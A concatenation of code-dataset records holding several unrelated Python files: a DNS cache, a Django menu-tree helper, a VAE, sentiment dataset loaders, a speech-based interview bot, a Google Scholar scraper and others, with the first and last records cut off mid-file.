== name) and (entry.type_of_value == int_from_type_of_value[type_of_value]):\n 
prio = '' if entry.priority == -1 else f' {entry.priority}'\n string = f'{entry.name} {type_of_value_from_int[entry.type_of_value]} {entry.value} {entry.ttl}{prio}'\n result.append(string)\n return result\n \n def __getAuthoritiesValues(self,name: str):\n \"\"\"\n Esta função devolve os authorities values de uma query.\n \"\"\"\n return self.__getResponseValues(name,'NS')\n\n def __getExtraValues(self, response_values: list, authorities_values: list):\n \"\"\"\n Esta função devolve os extra values de uma query.\n \"\"\"\n rv_values = set(map(lambda s: s.split(' ')[2],response_values)) # vai buscar o campo value \n av_values = set(map(lambda s: s.split(' ')[2],authorities_values)) # vai buscar o campo value \n result = []\n for entry in self.entries:\n if (entry.type_of_value == 7) and ((entry.name in rv_values) or (entry.name in av_values)):\n prio = '' if entry.priority == -1 else f' {entry.priority}'\n string = f'{entry.name} A {entry.value} {entry.ttl}{prio}'\n result.append(string)\n return result\n\n def getQueryResponse(self, name: str, type_of_value: str):\n \"\"\"\n Esta função calcula a resposta a uma queria a partir da cache.\n \"\"\"\n response_values = self.__getResponseValues(name,type_of_value)\n authorities_values = self.__getAuthoritiesValues(name)\n extra_values = self.__getExtraValues(response_values,authorities_values)\n return (response_values,authorities_values,extra_values)\n","repo_name":"orlandopalmeira/Trabalhos-CC-2022-2023","sub_path":"Resoluções/TP2 Parte A/src/cache.py","file_name":"cache.py","file_ext":"py","file_size_in_byte":6731,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"923293426","text":"\"\"\"utils for menu extras\"\"\"\nfrom ..models import MenuItemContainer\n\n\ndef make_tree_menu(menu_items: list[MenuItemContainer]) -> dict:\n \"\"\"Makes a tree menu as a dict\"\"\"\n # create dict with menu items dependencies\n items_with_keys = {}\n for menu_item in menu_items:\n if menu_item.parent_item_id in items_with_keys.keys():\n items_with_keys[menu_item.parent_item_id].append(menu_item)\n else:\n items_with_keys[menu_item.parent_item_id] = [menu_item]\n \n # check if there are layer with items without parent items\n if None not in items_with_keys.keys():\n raise ValueError(\"No root menu items (all menu items have parents.\")\n \n def create_recursive_tree(key):\n \"\"\"creates dict with menu\"\"\"\n # get current_layer\n layer = items_with_keys.get(key, None)\n\n if layer is None:\n return None\n \n # create tree\n tree_layer = {}\n for menu_item in layer:\n tree_layer[menu_item] = create_recursive_tree(menu_item.pk)\n\n return tree_layer\n \n return create_recursive_tree(None)\n\n\ndef find_in_tree(menu_tree: dict, url: str|None=None, url_name: str|None=None, names_list: list=[]) -> list:\n \"\"\"returns a list of names of menu items that are on the way to item with url\"\"\"\n # search for the menu item with specified url\n if menu_tree is None:\n return []\n\n new_names = names_list.copy()\n for menu_item in menu_tree.keys():\n if menu_item.url == url or (menu_item.url_name is not None and menu_item.url_name == url_name):\n new_names.append(menu_item.name)\n return new_names\n names_in_item = find_in_tree(menu_tree[menu_item], url, url_name, new_names + [menu_item.name])\n if names_in_item:\n return names_in_item\n \n return 
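A short usage sketch for the `Cache` class in the `cache.py` entry above, assuming the module is importable as `cache`; the type-of-value integers follow its `int_from_type_of_value` mapping, so `NS` is 6 and `A` is 7:

```python
from cache import Cache  # the class defined in the entry above

cache = Cache()
# addEntry(name, type_of_value, value, ttl, priority, origin)
cache.addEntry("example.com.", 6, "ns1.example.com.", 60, -1, 1)  # NS record
cache.addEntry("ns1.example.com.", 7, "10.0.0.1", 60, -1, 1)      # A record

# Response values for an NS query; the matching A record shows up in extras.
response, authorities, extras = cache.getQueryResponse("example.com.", "NS")
print(response)  # ['example.com. NS ns1.example.com. 60']
print(extras)    # ['ns1.example.com. A 10.0.0.1 60']

# Each passTime() call ages every entry by one second; once a TTL hits
# zero the entry's status flips to FREE and existsDomain stops matching.
for _ in range(60):
    cache.passTime()
print(cache.existsDomain("example.com."))  # False
```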
[]\n","repo_name":"Snowdr0p/djnestedmenu","sub_path":"nested_menu/templatetags/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1840,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9372341263","text":"class Produto:\n def __init__(self, nome, descricao, valor):\n self.__nome = nome\n self.__descricao = descricao\n self.__valor = valor\n\n def desconto(self, porcentagem):\n \"\"\"\n Retorna o valor do produto com desconto\n :param porcentagem: O desconto que será dado em porcentagem\n :return: Valor do produto com desconto\n \"\"\"\n return (self.__valor * (100 - porcentagem)) / 100\n\n\nproduto = Produto('PS4', 'Video Game', 2400)\nprint(produto.desconto(20))\nprint(Produto.desconto(produto, 40))\n","repo_name":"PierreVieira/Python_Examples","sub_path":"Metodos.py","file_name":"Metodos.py","file_ext":"py","file_size_in_byte":552,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"70512298490","text":"#!/usr/bin/env python3.3\n# -*- coding: utf-8 -*-\nimport re\nfrom urllib.request import urlopen\ndef getw():\n global whea,temp,content\n url='http://www.cwb.gov.tw/pda/observe/real/46757.htm'\n whea='天氣現象.*\\n.*>(.*)'\n temp='溫度.*\\n([\\d.]+)'\n content = urlopen(url).read().decode()\ndef wea():\n global whea\n global content\n getw()\n wh = re.search(whea, content)\n res=\"天氣現象: {}\".format(wh.group(1))\n return res\ndef tem():\n global temp\n global content\n getw()\n t=re.search(temp,content)\n res=\"溫度: {} ℃\".format(t.group(1))\n return res\n","repo_name":"daniel0076/Python-IRC-Bot","sub_path":"weather.py","file_name":"weather.py","file_ext":"py","file_size_in_byte":650,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22786844136","text":"import torch\nfrom torch import nn\nimport numpy as np\n\n\nclass VAE(nn.Module):\n def __init__(self):\n super(VAE, self).__init__()\n\n self.encoder = nn.Sequential(\n nn.Linear(784, 256),\n nn.ReLU(),\n nn.Linear(256, 64),\n nn.ReLU(),\n nn.Linear(64, 20),\n nn.ReLU()\n )\n self.decoder = nn.Sequential(\n nn.Linear(10, 64),\n nn.ReLU(),\n nn.Linear(64, 256),\n nn.ReLU(),\n nn.Linear(256, 784),\n nn.Sigmoid()\n )\n\n def forward(self, x):\n batchsz = x.size(0)\n # flatten\n x = x.view(batchsz, 784)\n # [b, 20] including mean and sigma\n h_ = self.encoder(x)\n # [b, 20] => [b, 10] and [b, 10]\n mu, sigma = h_.chunk(2, dim=1)\n # reparameterize trick\n h = mu + sigma * torch.randn_like(sigma)\n\n h_hat = self.decoder(h)\n # reshape\n h_hat = h_hat.view(batchsz, 1, 28, 28)\n\n kld = 0.5 * torch.sum(\n torch.pow(mu, 2) +\n torch.pow(sigma, 2) -\n torch.log(1e-8 + torch.pow(sigma, 2)) - 1\n ) / (batchsz*28*28) # np.prod(x.shape)\n\n return h_hat, kld\n","repo_name":"tianqingzx/markdown-notes","sub_path":"notes/Python编程技术/pytorch-learn/video/ae/vae.py","file_name":"vae.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"9259035770","text":"current_r, current_c, current_d = 7, 4, 0\ncurrent_room_map = [\n [1, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 1, 1, 1, 1, 0, 1],\n [1, 0, 0, 1, 1, 0, 0, 0, 0, 1],\n [1, 0, 1, 1, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 1, 1, 0, 1],\n [1, 0, 0, 0, 0, 0, 0, 0, 0, 1],\n [1, 1, 1, 1, 1, 
1, 1, 1, 1, 1]\n]\n\n# 북 동 남 서\ndr = [-1, 0, 1, 0]\ndc = [0, 1, 0, -1]\n\n\n# 방향 전환\ndef get_d_index_when_rotate_to_left(d):\n return (d + 3) % 4\n\n# 후진\ndef get_d_index_when_go_back(d):\n return (d + 2) % 4\n\n\ndef get_count_of_departments_cleaned_by_robot_vacuum(r, c, d, room_map):\n n = len(room_map)\n m = len(room_map[0])\n count_of_departments_cleaned = 1 # 청소하는 칸의 개수\n room_map[r][c] = 2 # 청소 된 부분은 2로 표시\n queue = list([[r, c, d]])\n\n while queue: # queue 가 비워지면 종료\n r, c, d = queue.pop(0) # 첫번째 값 pop\n print(r, c, d)\n temp_d = d # 현재 방향 저장\n\n for i in range(4):\n temp_d = get_d_index_when_rotate_to_left(temp_d) # 현재 방향에서 왼쪽으로 돈 값 -> temp_d는 왼쪽 회전한 값\n new_r, new_c = r + dr[temp_d], c + dc[temp_d] # 현재 r,c에 현재 방향값 더해줌\n\n # 왼쪽 방향에 아직 청소하지 않은 공간이 존재한다면,\n # 그 방향으로 회전한 다음 한 칸을 전진하고 1번부터 진행\n if 0 <= new_r < n and 0 <= new_c < m and room_map[new_r][new_c] == 0:\n count_of_departments_cleaned += 1\n room_map[new_r][new_c] = 2\n # print(room_map)\n queue.append([new_r, new_c, temp_d])\n break\n\n # 모든 방향이 청소되어 있다면 뒤로 한 칸 후진\n elif i == 3: # 갈 곳이 없는 경우\n # 갈 곳이 없으므로 현재 d 값에서 연산\n # 지금 temp_d는 왼쪽으로 회전한 값이므로 사용 X\n new_r, new_c = r + dr[get_d_index_when_go_back(d)], c + dc[get_d_index_when_go_back(d)]\n queue.append([new_r, new_c, d])\n\n # 네 방향 모두 청소가 이미 되어 있거나 벽이면서 뒤쪽 방향이 벽이라 후진도 할 수 없는 경우 작동을 멈춘다\n # 즉 모든 방향을 봤는데 갈 곳이 없고 뒤도 벽인 경우 멈춤\n if room_map[new_r][new_c] == 1:\n return count_of_departments_cleaned\n\n\n# 57 가 출력되어야 합니다!\nprint(get_count_of_departments_cleaned_by_robot_vacuum(current_r, current_c, current_d, current_room_map))\n","repo_name":"rkdmf11/sparta_algorithm","sub_path":"week_4/homework/02_get_count_of_departments_cleaned_by_robot_vacuum.py","file_name":"02_get_count_of_departments_cleaned_by_robot_vacuum.py","file_ext":"py","file_size_in_byte":2783,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40982063317","text":"\"\"\"Configurations for this app.\"\"\"\nfrom sys import exit, stderr, argv\n\ntry:\n import secrets\n SECRET_KEY = secrets.SECRET_KEY\n NYT_COMMUNITY_KEY = secrets.NYT_COMMUNITY_KEY\n NYT_ARTICLE_SEARCH_KEY = secrets.NYT_ARTICLE_SEARCH_KEY\n DEBUG = (len(argv) == 2 and argv[1] == 'debug')\n STDOUT = (len(argv) == 2 and argv[1] == 'stdout')\n META_TITLE = 'Happy Times'\n META_DESCRIPTION = (\n 'Sometimes the Times are happy, sometimes they are sad. We\\'ll keep '\n 'you informed with a web application that\\'s rad.'\n )\n META_NAME = 'Happy Times'\n META_TWITTER_HANDLE = '@danrschlosser'\n META_DOMAIN = 'happytimes.schlosser.io'\n META_URL = 'http://' + META_DOMAIN\n META_IMAGE = 'static/img/favicon/mstile-310x150.png'\n\nexcept ImportError:\n print >> stderr, 'Could not find config/secrets.py. 
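The robot-vacuum entry above encodes the four compass directions as 0-3 and turns with modular arithmetic; a tiny standalone check of those two helpers:

```python
# Directions: 0 = north, 1 = east, 2 = south, 3 = west (as in the entry).
def rotate_left(d: int) -> int:
    return (d + 3) % 4  # one step counter-clockwise

def go_back(d: int) -> int:
    return (d + 2) % 4  # opposite direction

d = 0                   # facing north
for _ in range(4):
    d = rotate_left(d)
print(d)                # 0 -- four left turns complete a full circle
print(go_back(1))       # 3 -- east flips to west
```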
Do you have one?'\n exit(1)\n\nexcept AttributeError as e:\n attr = e.message.lstrip('\\'module\\' object has no attribute ').rstrip('\\'')\n print >> stderr, 'config/secrets.py is missing the key \"%s\"' % attr\n exit(1)\n","repo_name":"shree-shubham/times-bot","sub_path":"config/flask_config.py","file_name":"flask_config.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"23564921252","text":"\"\"\"\nThis file contains the logic for loading data for all SentimentAnalysis tasks.\n\"\"\"\n\nimport os\nimport json, csv\nimport random\nfrom abc import ABC, abstractmethod\nfrom collections import defaultdict, Counter\nfrom typing import List, Dict, Callable\nfrom .data_processor import DataProcessor\n\n\nclass ImdbProcessor(DataProcessor):\n \"\"\"\n `IMDB `_ is a Movie Review Sentiment Classification dataset.\n\n we use dataset provided by `LOTClass `_\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.path = \"./datasets/SentimentAnalysis/imdb\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n label_file = open(os.path.join(data_dir, \"{}_labels.txt\".format(split)), 'r') \n labels = [int(x.strip()) for x in label_file.readlines()]\n with open(os.path.join(data_dir, '{}.txt'.format(split)),'r') as fin:\n for idx, line in enumerate(fin):\n text_a = line.strip()\n example = (text_a, int(labels[idx]), 0)\n examples.append(example)\n return examples\n \n\nclass AmazonProcessor(DataProcessor):\n \"\"\"\n `Amazon `_ is a Product Review Sentiment Classification dataset.\n\n we use dataset provided by `LOTClass `_\n \"\"\"\n\n def __init__(self):\n raise NotImplementedError\n super().__init__()\n self.path = \"./datasets/SentimentAnalysis/amazon\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n label_file = open(os.path.join(data_dir, \"{}_labels.txt\".format(split)), 'r') \n labels = [int(x.strip()) for x in label_file.readlines()]\n if split == \"test\": \n logger.info(\"Sample a mid-size test set for effeciecy, use sampled_test_idx.txt\")\n with open(os.path.join(self.args.data_dir,self.dirname,\"sampled_test_idx.txt\"),'r') as sampleidxfile:\n sampled_idx = sampleidxfile.readline()\n sampled_idx = sampled_idx.split()\n sampled_idx = set([int(x) for x in sampled_idx])\n\n with open(os.path.join(data_dir,'{}.txt'.format(split)),'r') as fin:\n for idx, line in enumerate(fin):\n if split=='test':\n if idx not in sampled_idx:\n continue\n text_a = line.strip()\n example = (text_a, int(labels[idx]), 0)\n examples.append(example)\n return examples\n\n\nclass SST2Processor(DataProcessor):\n \"\"\"\n \"\"\"\n\n def __init__(self):\n super().__init__()\n self.labels = [\"negative\", \"positive\"]\n self.path = \"./datasets/SentimentAnalysis/SST-2\"\n\n def get_examples(self, data_dir, split):\n examples = []\n if data_dir is None:\n data_dir = self.path\n path = os.path.join(data_dir,\"{}.tsv\".format(split))\n with open(path, 'r') as f:\n reader = csv.DictReader(f, delimiter='\\t')\n for idx, example_json in enumerate(reader):\n text_a = example_json['sentence'].strip()\n example = (text_a, int(example_json['label']), 0)\n examples.append(example)\n return examples\n\nPROCESSORS = {\n \"amazon\" : AmazonProcessor,\n \"imdb\": ImdbProcessor,\n \"sst-2\": 
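The `flask_config.py` entry above uses Python 2-only constructs (`print >> stderr, ...` and `e.message`) that raise syntax or attribute errors on Python 3; a hedged Python 3 rewrite of the error handling, keeping the original messages:

```python
import sys

try:
    # NB: on Python 3.6+ a bare `import secrets` can resolve to the
    # standard library's secrets module rather than config/secrets.py,
    # depending on sys.path ordering.
    import secrets
    SECRET_KEY = secrets.SECRET_KEY
except ImportError:
    print('Could not find config/secrets.py. Do you have one?', file=sys.stderr)
    sys.exit(1)
except AttributeError as e:
    # `e.message` is Python 2 only; str(e) is portable.
    print('config/secrets.py is missing a key: %s' % e, file=sys.stderr)
    sys.exit(1)
```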
SST2Processor,\n}\n","repo_name":"thunlp/OpenBackdoor","sub_path":"openbackdoor/data/sentiment_analysis_dataset.py","file_name":"sentiment_analysis_dataset.py","file_ext":"py","file_size_in_byte":3586,"program_lang":"python","lang":"en","doc_type":"code","stars":113,"dataset":"github-code","pt":"77"} +{"seq_id":"23782162915","text":"import foqus_lib.version.version as ver\n\ndef writeHelpFiles():\n #There are 4 main CCSI Packages used by FOQUS\n #\n # 1. FOQUS\n # 2. Turbine Client\n # 3. PSUADE\n # 4. ALAMO\n #\n # For now I'm going to ignore ALAMO and PSUADE they need to be installed separately\n # so I'm not going to worry about including their licenses.\n #\n # read the template for the HTML license files\n with open(\"html/licenseTemplate.html\", 'r') as f:\n template = f.read()\n #Both FOQUS and Turbine are CCSI Testing and Evaluation for now\n with open(\"../../LICENSE.md\", 'r') as f:\n lic = f.read()\n lic = lic.replace(\"\\n\", \"
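A usage sketch for the processors registered in `PROCESSORS` above, assuming the module is importable and the dataset directory is laid out as the class's default `self.path` expects (tab-separated files with `sentence` and `label` columns for SST-2):

```python
from sentiment_analysis_dataset import PROCESSORS

processor = PROCESSORS["sst-2"]()  # SST2Processor
examples = processor.get_examples(data_dir=None, split="train")

# Each example is a (text, label, poison_flag) triple.
text, label, poisoned = examples[0]
print(len(examples), label, poisoned)
print(text[:60])
```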
\")\n template2 = template.replace(\"PKG_LICENSE\", lic, 1)\n newhtml = template2.replace(\"PKG_NAME\", \"FOQUS\")\n newhtml = newhtml.replace(\"[SOFTWARE NAME & VERSION]\", \"FOQUS \" + str(ver.version), 1)\n \n newhtml = newhtml.replace(\"PKG_COPYRIGHT\", ver.copyright)\n with open(\"html/foqus_license.html\", 'w') as f:\n f.write(newhtml)\n newhtml = template2.replace(\"PKG_NAME\", \"Turbine Client\")\n newhtml = newhtml.replace(\"[SOFTWARE NAME & VERSION]\", \"Turbine Client\", 1)\n newhtml = newhtml.replace(\"PKG_COPYRIGHT\", ver.copyright)\n with open(\"html/turbine_client_license.html\", 'w') as f:\n f.write(newhtml)\n\nif __name__ == '__main__':\n writeHelpFiles()\n","repo_name":"MAZamarripa/foqus","sub_path":"foqus_lib/help/writeCCSILicenseHelpFiles.py","file_name":"writeCCSILicenseHelpFiles.py","file_ext":"py","file_size_in_byte":1341,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25035705605","text":"#!/usr/bin/env python3\n\nimport speech_recognition as sr\nfrom os import system\nimport random\nimport nltk\nimport time\nfrom tkinter import *\nimport tkinter as tk\nimport sys\nfrom Detect_Topic.naive_bayes_classifer import classify_topic\nfrom Check_Semantic_Similarity.sentence_similarity import find_similarity\nfrom utils import record_convo\nimport pickle\nimport spacy\n\n\nnlp = spacy.load('en_core_web_md')\n\n#load model\nwith open('./Detect_Topic/nb_classifier.pkl', 'rb') as f:\n clf = pickle.load(f)\nwith open('./Detect_Topic/count_vect.pkl', 'rb') as f:\n count_vect = pickle.load(f)\n\n\nintroduction = ['Tell me about yourself.',\n'Please introduce yourself.',\n'Tell me what motivates you about tech.',]\n\nprojects = ['can you please brief me about your contribution in {}',\n'Please explain what you did in the project named {}',\n'Your project seems intersting. Can you please explain about {}',\n'If you had to choose one project to explain, which one would it be? And why?',\n'Okay, Let us move our focus to your porject named {}',\n'I shall now ask you some questions related to your project {} . Can you tell me about it in brief.',\n'What did you learn in the course of your project {}'\n]\n\nexpertise = ['I see you have mentioned {} as your strength. Can you please explain why?',\n'How well are you versed in {}',\n'Now comes the intersting part. Tell me about your knowledge in {}',\n'What have you worked with in {}',\n'You have mentioned {} in your strong fields. Why do we use that?']\n\n#list of default questions\ndefaultQuestions = ['Can you tell me one important project you have done?',\n 'I assume you know about basic OOP. 
What do you think about object oriented programming?',\n 'Can you explain how memory is managed inside a modern computer?']\n\n\n\ntake_input = True\n\n\ndef voice_out(questionData,root):\n\n\tglobal ShowTextFrame\n\tglobal QuestionsAsked\n\tShowTextFrame = Frame(root,background = 'black')\n\tShowTextFrame.grid(row=10 , column=0)\n\t#cleardata = \" \"\n\n\tclear_data = \" \"*80\n\n\tname1 = Label(ShowTextFrame,text=clear_data,background = 'black',fg = 'white')\n\tname1.grid(row=2,column = 1,padx=100, pady=30)\n\n\tname1 = Label(ShowTextFrame,text=questionData,background = 'black',fg = 'white')\n\tname1.grid(row=2,column = 1,padx=100, pady=30)\n\t\n\tsystem('say %s' % (questionData))\n\n\t#ShowTextFrame.grid_forget()\n\tQuestionsAsked += 1 \n\treturn ShowTextFrame\n\n\nwith open('./Questions/hardware.txt','r') as pyfi:\n\thardwarelist = pyfi.readlines()\nwith open('./Questions/data_science.txt','r') as cfi:\n\tdata_sciencelist = cfi.readlines()\nwith open('./Questions/web_dev.txt','r') as algofi:\n\tweb_devlist = algofi.readlines()\n\nwith open('./Answers/hardware.txt','r') as pyfi:\n\tans_hardwarelist = pyfi.readlines()\nwith open('./Answers/data_science.txt','r') as cfi:\n\tans_data_sciencelist = cfi.readlines()\nwith open('./Answers/web_dev.txt','r') as algofi:\n\tans_web_devlist = algofi.readlines()\n\n# 'Hardware' 'Data Science' 'Data Science' 'Web Development'\ndef ask_topic(topic):\n\tprint (topic)\n\t\n\tif topic == 'Hardware':\n\t\task_id = random.randint(0,len(hardwarelist)-1)\n\t\tquestion = hardwarelist[ask_id]\n\t\tanswer = ans_hardwarelist[ask_id]\n\t\thardwarelist.remove(question)\n\t\tans_hardwarelist.remove(answer)\n\t\treturn (question,answer,1,)\n\n\n\tif topic == 'Data Science':\n\t\task_id = random.randint(0,len(data_sciencelist)-1)\n\t\tquestion = data_sciencelist[ask_id]\n\t\tanswer = ans_data_sciencelist[ask_id]\n\t\tdata_sciencelist.remove(question)\n\t\tans_data_sciencelist.remove(answer)\n\t\treturn (question,answer,1,)\n\n\tif topic == 'Web Development':\n\t\task_id = random.randint(0,len(web_devlist)-1)\n\t\tquestion = web_devlist[ask_id]\n\t\tanswer = ans_web_devlist[ask_id]\n\t\tweb_devlist.remove(question)\n\t\tans_web_devlist.remove(answer)\n\t\treturn (question,answer,1,)\n\ndef counter():\n if 'cnt' not in counter.__dict__:\n counter.cnt = 0\n counter.cnt += 1\n return counter.cnt\n\n\ndef process_input(user_input):\n\tcounter()\n\tif (counter.cnt < 2):\n\t\tchoosevaal = [1,2]\n\t\tcho = random.choice(choosevaal)\n\t\tif cho == 1 and len(ProgrammingLanguages) != 0:\n\t\t\tsent = random.choice(expertise)\n\t\t\texpertise.remove(sent)\n\t\t\topt = random.choice(ProgrammingLanguages)\n\t\t\treturn (sent.format(opt),\"\",0,)\n\t\telif len(knowledgeStack) != 0:\n\t\t\tsent = random.choice(projects)\n\t\t\tprojects.remove(sent)\n\t\t\topt = random.choice(knowledgeStack)\n\t\t\treturn (sent.format(opt),\"\",0,)\n\telse:\n\t\ttopics = (classify_topic(user_input,count_vect,clf))\n\t\treturn (ask_topic(topics[0]))\n\t\t\n#Get small quantum packets of input which we will treat as small sentences\ndef getQuantumInput():\n\tr = sr.Recognizer()\n\tr.pause_threshold = 0.2\n\tr.phrase_threshold = 0.1\n\tr.non_speaking_duration = 0.1\n\twith sr.Microphone() as source:\n\t\ttry:\n\t\t\taudio = r.listen(source, timeout = 4)\n\t\t\treturn audio\n\t\texcept sr.WaitTimeoutError:\n\t\t\tprint(\"Timed out\")\n\t\t\treturn None\n\n\n# get audio from the microphone\ndef get_input(questionData,ShowTextFrame):\n\tr = sr.Recognizer()\n\tInputList = 
[]\n\tprint(questionData)\n\tShowTextFrame = voice_out(questionData,ShowTextFrame)\n\twhile(True):\n\t\tquantumInput = getQuantumInput() #call this for getting small sentences\n\t\tif (quantumInput == None): #if more than 5 sec pause in candidate answer then end answer\n\t\t\tprint(\"Processing...\")\n\t\t\tShowTextFrame.grid_forget()\n\t\t\treturn InputList\n\t\tInputList.append(quantumInput)\n\n\n\ndef getTextInput(questionData,ShowTextFrame):\n\t\n\t# r = sr.Recognizer()\n\t# TextList = []\n\t# AudioList = []\n\t# AudioList = get_input(questionData,ShowTextFrame)\n\t# #print(\"Got all audio inputs\")\n\t# print(AudioList)\n\t# for recordedAudio in AudioList:\n\t# \tTextSnippet = r.recognize_google(recordedAudio)\n\t# \tprint(\"-\" , TextSnippet)\n\t# \tTextList.append(TextSnippet)\n\t# #print(TextList)\n\t# return TextList\n\n\tShowTextFrame = voice_out(questionData,ShowTextFrame)\n\ttext_ip = sys.stdin.readline() \n\tTextList = nltk.sent_tokenize(text_ip)\n\treturn TextList\n\n\n\n####################\n#### MAIN MODULE ###\n####################\n\n\nQuestionsAsked = 0\ndef startInterview(ShowTextFrame,name,cpi,project1,project2,project3,programmingLanguages,POR1,POR2,POR3): \n\tproposedQuestion = \"I am Sid, your virtual questioner. \" + random.choice(introduction)\n\n\t\n\tglobal QuestionsAsked\n\tglobal knowledgeStack\n\tknowledgeStack = []\n\n\tglobal Name, Number_of_Questions ,Project1, Project2, Project3\n\tglobal ProgrammingLanguages\n\n\tProgrammingLanguages = []\n\n\tName = name\n\tNumber_of_Questions = cpi\n\tProject1 = project1\n\tProject2 = project2\n\tProject3 = project3\n\n\tprint (\"Number of Questions: \",Number_of_Questions)\n\tknowledgeStack.append(project1)\n\tknowledgeStack.append(project2)\n\n\tfor i in programmingLanguages.split(','):\n\t\t#knowledgeStack.append(i)\n\t\tProgrammingLanguages.append(i)\n\n\tprint(knowledgeStack)\n\n\tuser_input = [\"Hello\"]\n\n\tif Number_of_Questions.lower() == 'easy':\n\t\tnumber_of_Quest = 6\n\telif Number_of_Questions.lower() == 'medium':\n\t\tnumber_of_Quest = 8\n\telif Number_of_Questions.lower() == 'tough':\n\t\tnumber_of_Quest = 10\n\telse:\n\t\tnumber_of_Quest = 5\n\n\n\n\tquestionData = proposedQuestion\n\tsampleAnswer = \"\"\n\tanswer_avail_flag = 0\n\twhile(QuestionsAsked < number_of_Quest):\n\t\ttry:\n\t\t\tquestionData = proposedQuestion\n\t\t\tuser_input = getTextInput(questionData,ShowTextFrame)\n\t\t\tscore = 0\n\t\t\tif(answer_avail_flag):\n\t\t\t\tscore = find_similarity(sampleAnswer,user_input,nlp)\n\t\t\t\tprint(\"#\"*30)\n\t\t\t\tprint(\"Answer matching index: \",score)\n\t\t\t\tprint(\"#\"*30)\n\t\t\trecord_convo(questionData,user_input[0], sampleAnswer, score)\n\t\t\tproposedQuestion, sampleAnswer, answer_avail_flag = process_input(user_input)\n\t\t\t#system(user_input)\n \t\t#user_input = r.recognize_google(audio)\n \t\t#process_input(user_input)\n\n\t\texcept sr.UnknownValueError:\n\t\t\tprint(\"Could not understand audio\")\n\t\t\tif len(user_input) != 0:\n\t\t\t\tproposedQuestion = process_input(user_input)\n\n\t\texcept sr.RequestError as e:\n\t\t\tprint(\"Could not request results; {0}\".format(e))\n\t\ttry:\n\t\t\tShowTextFrame.grid_forget()\n\t\texcept Exception as e:\n\t\t\tpass\n\n\tfinal = \"Well Thank You \"+ name +\". 
Your interview has concluded.\" \n\tvoice_out(final,ShowTextFrame)\n\treturn\n\n","repo_name":"ChinmoyJyotiKathar/HumbleFoolCharityHackathon2017","sub_path":"interview_bot/interviewProgram.py","file_name":"interviewProgram.py","file_ext":"py","file_size_in_byte":8145,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"73176016570","text":"import requests\nfrom bs4 import BeautifulSoup\nfrom serpapi import GoogleSearch\nimport csv\nimport os\nfrom difflib import SequenceMatcher\n\n\ndef calc_similarity(str1, str2):\n \"\"\"\n Calculates the similarity between two strings.\n\n Parameters:\n str1 (str): The first string.\n str2 (str): The second string.\n\n Returns:\n float: The similarity coefficient between the two strings.\n\n \"\"\"\n str1 = str1.strip()\n str2 = str2.strip()\n seq_matcher = SequenceMatcher(None, str1.lower(), str2.lower())\n return seq_matcher.ratio()\n\n\ndef get_paper_titles(url):\n \"\"\"\n Retrieves the titles of articles from a web page.\n\n Parameters:\n url (str): The URL of the web page.\n\n Returns:\n list: A list of dictionaries containing the titles and authors of the articles.\n\n \"\"\"\n # Make a GET request to the URL\n response = requests.get(url)\n\n # Check if the request was successful or not\n if response.status_code == 200:\n print('The request was successful')\n else:\n print('An error occurred while making the request')\n\n # Get the HTML content from the response\n html = BeautifulSoup(response.text, 'html.parser')\n\n # Find all elements in the HTML\n titles = html.find_all('font')\n\n # Initialize a list to store the articles\n papers = []\n\n # Iterate over the found titles\n for title in titles:\n # Find the element that contains the article title\n text = title.find('b')\n\n # Find the element that contains the article author\n author = title.find('i')\n\n # Find all elements that contain related links for the article\n scholar = title.find_all('a')\n\n # Check if the title is not empty and not equal to unwanted values\n if text and text.text.strip() not in ['Abstract:', '[pdf] [scholar]']:\n # Clean and format the article title\n title_paper = text.text.replace(\"\\x92\", \"'\").replace(\n \"\\r\", \" \").replace(\"\\n\", \" \")\n\n # Clean and format the article author\n author = author.text.replace(\"\\x92\", \"'\").replace(\n \"\\r\", \" \").replace(\"\\n\", \" \")\n\n # Add the article to the list\n papers.append({\n 'title': title_paper,\n 'title_google': '-',\n 'author_google': '-',\n 'cited_by': '0',\n 'author': author\n })\n\n # Return the list of articles\n return papers\n\n\ndef search_paper_info(paper_title, api_key):\n \"\"\"\n Searches for information about a paper using the Google Scholar API.\n\n Parameters:\n paper_title (str): The title of the paper.\n api_key (str): The API key for accessing the Google Scholar API.\n\n Returns:\n dict or None: A dictionary containing information about the paper if a match is found, or None if no match is found.\n\n \"\"\"\n # Set the parameters for the API request\n params = {\n \"engine\": \"google_scholar\",\n \"q\": paper_title,\n \"api_key\": api_key\n }\n\n # Create a GoogleSearch instance with the parameters\n search = GoogleSearch(params)\n\n # Perform the search and retrieve the results as a dictionary\n results = search.get_dict()\n\n # Get the organic search results\n organic_results = results[\"organic_results\"]\n\n # Check if there are any organic search results\n if len(organic_results) > 0:\n # Iterate over the 
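The `counter()` helper in the `interviewProgram.py` entry above stores its call count as an attribute on the function object itself, a lightweight alternative to a module-level global; stripped down:

```python
def counter() -> int:
    # State lives on the function object, so no global declaration needed.
    if 'cnt' not in counter.__dict__:
        counter.cnt = 0
    counter.cnt += 1
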